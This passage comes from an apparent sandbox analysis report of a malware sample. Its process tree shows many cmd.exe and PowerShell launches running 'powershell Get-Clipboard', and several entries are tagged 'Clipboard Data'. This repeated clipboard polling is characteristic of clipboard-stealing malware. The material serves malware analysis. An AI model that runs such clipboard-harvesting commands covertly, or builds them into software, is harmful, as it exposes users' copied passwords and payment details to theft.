  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4336
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2624
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:1080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2760
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4256
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:4356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3268
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5004
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2712
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:3652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1932
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:2936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4572
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4164
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:1232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:2312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:1688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:2308
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2836
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:3216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5028
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4484
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4252
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:3956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:4960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:5056
- C:\Windows\system32\cmd.exe
